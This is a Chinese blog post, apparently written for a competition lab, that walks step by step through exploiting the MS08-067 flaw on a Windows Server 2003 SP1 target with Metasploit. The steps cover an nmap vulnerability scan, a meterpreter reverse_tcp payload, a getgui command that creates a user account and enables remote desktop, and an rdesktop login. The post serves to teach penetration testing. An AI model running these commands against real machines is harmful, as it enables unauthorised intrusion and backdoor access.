Metasploit渗透winserv 2003 sp1

今天因为比赛的原因写一个关于MS08_067的渗透文章,网上已经有很多前辈写过关于MS08_067的文章,非常的好,我也看了很多的文章,对我启发很大。话不多说!开始我今天做题用到的主角MS08_067。

首先我们要先安装好Kali linux  这个在座的肯定比我要熟,对里面的工具,命令已经很透彻了。

我们先对目标靶机进行信息收集,就用到了Nmap这个工具

我使用的参数是 -O 扫描系统版本信息、 -sV 是系统服务及版本信息、 --script=vuln 是使用脚本扫描,vuln是检查目标主机是否存在已知漏洞(例如:ms08_067)

扫描结束了,我们来看看结果

因为我这个之前做个实验,开启过3389 ,不过不会影响下面的操作的。

使用脚本扫描也扫描出来了结果,

常见漏洞有ms08-067、还有去年比较火的ms17-010。我们这里只需要用到我们的主角ms08-067。

然后我们调用Metasploit,在里面使用ms08_067

它会开始加载,第一次可能比较慢,耐心等待就好啦orz

 

终于进入了这个界面

我们需要用到ms08_067这个攻击载荷

我们快速搜索,使用search命令

搜索到路径文件。

我们使用use命令使用这个模块

进入后,我们查看一下需要设置的参数:show options

我们需要设置一下目标靶机IP地址:set RHOST 192.168.43.215

我的靶机是winserv2003 SP1 。

可以使用tab键进行补全。

仅此还是不够的,还需要设置payload。

我这里使用的是:windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

设置完成payload以后,我们在使用show options 查看一下需要配置的参数

多了一个LHOST 我们这时候输入自己kali本机ip地址:set LHOST 192.168.43.27(在这个地方使用tab键可以自动补全ip地址)

设置完成后,我们可以用exploit进行攻击测试。

现在给我们返回了一个meterpreter的对话框,我们可以在这里进行一些系统级别的操作。

我这里使用的是: run getgui -u CSND -p 123456

相信大家一定也知道我这条命令的用法, -u 是创建用户“CSDN” -p是设置密码“123456”

在以往的渗透中,一些人拿到了meterpreter的时候都会shell进入cmd,输入一大堆的命令去开启3389,命令太长,不愿意去记住,使用getgui 就可以轻松开始3389,让我们来看一下吧!

命令:run getgui -e

从反馈的信息来看,远程桌面已经准备好,RDP也已经启用,我们就可以确定3389已经开启。

这时候我们就可以使用万能的Kali linux 进行远程桌面连接了。

命令如下

rdesktop 192.168.43.215 

这个工具可以让我们像在windows下一样连接远程桌面,非常的好用。

输入这时候我们前面设置的用户名和密码

进行登录。

成功进入了桌面,我们就可以做自己想做的事情了,emmm!意味着我要开始做题了。

这篇博客还有一些地方写的不好,时间原因也没有及时进行改进,请各位谅解

本人小白,各位大佬看了勿喷,希望大佬能多多指点我一下。

本人QQ:MTYyNzIzODc3NA

喜欢渗透的朋友可以加我qq一起交流一下,好东西还是要分享的

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值